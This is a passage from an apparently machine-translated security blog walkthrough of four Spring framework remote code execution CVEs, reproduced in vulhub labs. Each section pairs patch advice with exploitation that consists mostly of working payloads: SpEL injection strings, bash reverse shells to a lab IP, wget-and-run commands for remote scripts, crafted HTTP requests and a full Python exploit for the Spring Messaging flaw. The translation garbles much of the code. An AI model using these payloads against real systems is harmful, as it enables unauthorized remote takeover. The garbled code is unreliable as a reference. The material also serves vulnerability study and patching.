Safety protection
1. Users of version 1.0.x should forego using the Whitelabel view in the authentication pass and error pages. 2. Users using version 2.0.x upgrade to version 2.0.10 and later
Because I am not familiar with Java, I did not analyze the underlying principles
2.Spring Web Flow Framework Remote Code Execution (CVE-2017-4971)
Vulnerability profile
Spring Web Flow is a subproject of Spring that addresses stateful interactions between users and servers across multiple requests, providing abstract capabilities to describe business processes.
Spring WebFlow is a framework for developing process-based applications, such as shopping logic, that separates the definition of a process from the classes and views that implement the behavior of the process. In its 2.4.x version, if we controlled the field during data binding, this would lead to an SpEL expression injection vulnerability, resulting in arbitrary command execution.
Affects version
Spring WebFlow 2.4.0-2.4.4Copy the codeThe trigger condition
-
The useSpringBeanBinding parameter of the MvcViewFactoryCreator object needs to be set to false (default)
-
Set the BinderConfiguration object to empty in the Flow View object
Vulnerability emersion
Open hole
Click on the login
You can see that there are a lot of default usernames and passwords, so just choose any of them to log in to the system
Then access the hotel address with id 1:
http://192.168.173.144:8080/hotels/1
Copy the code
Click the reservation button “Book Hotel”, fill in the relevant information and then click” Process “(from this step, actually WebFlow officially starts)
After typing something random, we click Proceed and take us to the Confirm page (Credit Card is 16 bits) :
Click Confirm to capture packets
Rebound shell poC:
The original POC: & _ (new Java. Lang. ProcessBuilder (" bash ", "- c", "bash - > I & / dev/TCP / 192.168.173.133/1234 0 > & 1")). The start () = vulhub URL encoded & _ (new Java. Lang. ProcessBuilder (" bash ", "- c", "bash I + + - > % 26 + / dev/TCP / 192.168.173.133/1234 0 > % 261")). The start () = vulhubCopy the code
Exp extension
1. Write files to it
&_T(java.lang.Runtime).getRuntime().exec("touch /tmp/zcc") Copy the code
2. Use wget to download the remote bash script
&_T(java.lang.Runtime).getRuntime().exec("/usr/bin/wget -qO /tmp/shell http://x.x.x.x:xxxx/shell") Copy the code
3. Execute the script downloaded in the previous step
&_T(java.lang.Runtime).getRuntime().exec("/bin/bash /tmp/shell") Copy the code
Safety protection
A new version has been released. Affected users are advised to update to the latest version to protect against this vulnerability. Officials also recommend that users change the default data binding Settings to ensure that the submitted form information meets the requirements to prevent such malicious behavior. Reference links:
https://pivotal.io/security/cve-2017-4971
For a low-level analysis of this vulnerability, you can check out this article: paper.seebug.org/322/
3.Spring Data Rest Remote command Execution command (CVE-2017-8046)
Vulnerability profile
When the Spring-data-REST server processes the PATCH request, an attacker can construct a malicious PATCH request and send it to the Spring-Date-REST server to execute arbitrary Java code through the constructed JSON data.
Affects version
Spring Data REST versions < 2.5.12, 2.6.7, 3.0 RC3
Spring Boot version < 2.0.0M4
Spring Data release trains < Kay-RC3
Copy the codeVulnerability validation
Open the vulnerability environment:
If you see the return value in JSON format, you can see that this is a Restful API server.
Access the following URL. If the following information is displayed, the vulnerability exists:
http://192.168.173.144:8080/customers/1
Copy the code
Vulnerability emersion
Bp captured the packet and used PATCH request to modify:
Create poC for file touch/TMP/ZCC
", ". Join (map (STR, (map (word, "touch/TMP/ZCC")))) '116111117,99,104,32,47,116,109,112,47,122,99,99'Copy the code
Write this code into the POC and put it into the request package. Note that the POC in JSON format leaves a blank line above it. Content-type: application/ JSON-patch + JSON
Customers /1 HTTP/1.1 Host: localhost:8080 Accept-encoding: gzip, deflate Accept: */* Accept-language: En the user-agent: Mozilla / 5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/json-patch+json Content-Length: 201 [{"op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new ,99,104,32,47,116,109,112,47,122,99,99 byte [] {116111117}))/lastname ", "value" : "vulhub}]" "Copy the code
Write successfully:
Echo shell POC, base64 encoding first:
Bash - > I & / dev/TCP / 192.168.173.1234/8888 0 > &1 bash - c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3My4xMzMvMTIzNCAwPiYx}|{base64,-d}|{bash,-i} 98,97,115,104,32,45,99,32,123,101,99,104,111,44,89,109,70,122,97,67,65,116,97,83,65,43,74,105,65,118,90,71,86,50,76,51,8 2106,99,67,56,120,79,84,73,117,77,84,89,52,76,106,69,51,77,121,52,120,77,122,77,118,77,84,73,122,78,67,65,119,80,105,89 , 120125124123,98,97,115,101,54,52,44,45,100,125,124,123,98,97,115,104,44,45,105,125Copy the code
Write poC and rebound successfully.
Safety protection
Upgrade to the following latest versions:
- Spring Data REST 2.5.12, 2.6.7, 3.0 RC3
- Spring Boot 2.0.0. M4
- Spring Data release train Kay-RC3
For the flaw of the underlying principle analysis of the article you can refer to this article: blog.spoock.com/2018/05/22/…
4.Spring Messaging Remote Command Execution Breakthrough (CVE-2018-1270)
Vulnerability profile
Spring Messaging provides message support for the Spring framework. Its upper layer protocol is STOMP, and the lower layer communication is based on SockJS. STOMP message broker has SpEL expression injection vulnerability when processing client messages. And uses selector to filter messages. The selector written in SpEL expression and use StandardEvaluationContext parsing, causing loopholes command execution.
Affects version
Spring Framework 5.0-5.0.5 Spring Framework 4.3-4.3.15 Older versions that are not supported are still affectedCopy the codeVulnerability validation
Open hole
Visit this page:
http://192.168.173.144:8080/gs-guide-websocket
Copy the code
Vulnerability emersion
Base64 encoding for the rebound shell command:
Bash - > I & / dev/TCP / 192.168.173.133/1234 0 > &1 bash - c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3My4xMzMvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}Copy the codeCreate exp. Py, modify the IP address and command statement:
#! /usr/bin/env python3 import requests import random import string import time import threading import logging import sys import json logging.basicConfig(stream=sys.stdout, level=logging.INFO) def random_str(length): letters = string.ascii_lowercase + string.digits return ''.join(random.choice(letters) for c in range(length)) class SockJS(threading.Thread): def __init__(self, url, *args, **kwargs): super().__init__(*args, **kwargs) self.base = f'{url}/{random.randint(0, 1000)}/{random_str(8)}' self.daemon = True self.session = requests.session() self.session.headers = { 'Referer': Url, 'the user-agent' : 'Mozilla / 5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'} self.t = int(time.time()*1000) def run(self): url = f'{self.base}/htmlfile? c=_jp.vulhub' response = self.session.get(url, stream=True) for line in response.iter_lines(): Def send(self, command, headers, body=''): data = [command.upper(), '\n'] data.append('\n'.join([f'{k}:{v}' for k, v in headers.items()])) data.append('\n\n') data.append(body) data.append('\x00') data = json.dumps([''.join(data)]) response = self.session.post(f'{self.base}/xhr_send? t={self.t}', data=data) if response.status_code ! = 204: logging.info(f"send '{command}' data error.") else: logging.info(f"send '{command}' data success.") def __del__(self): The self. The session. The close () sockjs = sockjs (' http://192.168.173.144:8080/gs-guide-websocket ') sockjs. Start () time. Sleep (1) Sockjs. send('connect', {'accept-version': '1.1,1.0', 'heart-beat': '10000,10000'}) sockjs.send('subscribe', {'selector': "T(java.lang.Runtime).getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3My4xMzMvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}')", 'id': 'sub-0', 'destination': '/topic/greetings' }) data = json.dumps({'name': 'vulhub'}) sockjs.send('send', { 'content-length': len(data), 'destination': '/app/hello' }, data)Copy the code
Successful rebound.
Safety protection
1. Upgrade the Spring framework to the latest version (5.0.5, 4.3.15 or later).
2. If you are using SpringBoot, upgrade to the latest version (2.0.1 or later);
An analysis of the underlying principles can be found at paper.seebug.org/562/
5.Spring Data Commons Remote Command Execution Vulnerability (CVE-2018-1273)
Vulnerability profile
Spring Data Is an open source framework for simplifying database access and enabling cloud services. Spring Data Commons is the infrastructure shared by all Spring Data subprojects. Spring Data Commons 2.0.5 and earlier has a SpEL expression injection vulnerability that allows an attacker to inject malicious SpEL expressions to execute arbitrary commands.
Affects version
Spring Data Commons 1.13 -- 1.13.10 (Ingalls SR10) Spring Data REST 2.6 -- 2.6.10(Ingalls SR10) Spring Data Commons 2.0 -- 2.0.5 (Kay SR5) Spring Data REST 3.0 -- 3.0.5(Kay SR5Copy the codeVulnerability validation
Start the loopholes
Vulnerability emersion
Access the URL, BP packet capture
http://192.168.173.144:8080/users
Copy the code
The request package with poC is as follows:
POST /users? Page =&size=5 HTTP/1.1 Host: 192.168.173.144:8080 User-agent: Mozilla/5.0 (X11; Linux x86_64; The rv: 78.0) Gecko / 20100101 Firefox 78.0 / Accept: text/HTML, application/XHTML + XML, application/XML. Q = 0.9, image/webp, * / *; Q = 0.8 Accept - Language: en - US, en. Q =0.5 accept-encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 120 Origin: http://192.168.173.144:8080 Connection: close Referer: http://192.168.173.144:8080/users cookies: JSESSIONID=F773DEBD35D866E11D6753373652513C Upgrade-Insecure-Requests: 1 username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/zcc")]=&password=&repeatedPassword=Copy the code
Succeeded in writing.
Rebound in the shell:
Write a shell. Sh file to enable the HTTP service:
Download the sh script:
The/usr/bin/wget - qO/TMP/shell. Sh http://192.168.173.131/shell.shCopy the code
Perform shell. Sh
/bin/bash /tmp/shell.sh
Copy the code
Successful rebound.
Safety protection
- Users of affected versions should apply the following mitigation measures:
-
2.0.x users should upgrade to 2.0.6
-
1.13.x users should upgrade to 1.13.11
-
Older versions should be upgraded to supported branches
Releases that have addressed this issue include:
-
Spring Data REST 2.6.11 (Ingalls SR11)
-
Spring Data REST 3.0.6 (Kay SR6)
-
Spring Boot 1.5.11
-
Spring Boot 2.0.1
- Use the authentication and authorization provided by Spring Security to restrict specific access.